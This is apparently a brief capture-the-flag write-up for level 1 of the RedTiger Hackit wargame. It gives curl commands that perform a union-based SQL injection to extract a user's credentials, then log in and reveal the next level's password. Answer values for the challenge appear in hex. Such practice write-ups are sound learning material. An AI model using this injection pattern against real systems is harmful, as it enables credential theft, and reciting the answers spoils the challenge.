# RedTigers Hackit wargame: Level 1

# curl --silent --insecure https://redtiger.dyndns.org/hackit/level1.php
<b>Welcome to level 1</b>
Lets start with a simple injection.
Target: Get the login for the user Hornoxe
Hint: You really need one? omg -_-
Tablename: level1_users

<br>Category: <a href="?cat=1">1</a><br><br>This category does not exist! <br>                  <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
# curl --silent --insecure "https://redtiger.dyndns.org/hackit/level1.php?cat=1%20union%20select%201,2,username,password%20from%20level1_users" | grep ">Hornoxe" | awk -F "<br>" '{print $4}'
# curl --silent --insecure --request POST --data "user=Hornoxe&password=7468617477617365617379&login=Login" https://redtiger.dyndns.org/hackit/level1.php | grep is:
<br>The password for the next level is: <b>656173796c6576656c7361726565617379</b> <br><br>

No comments: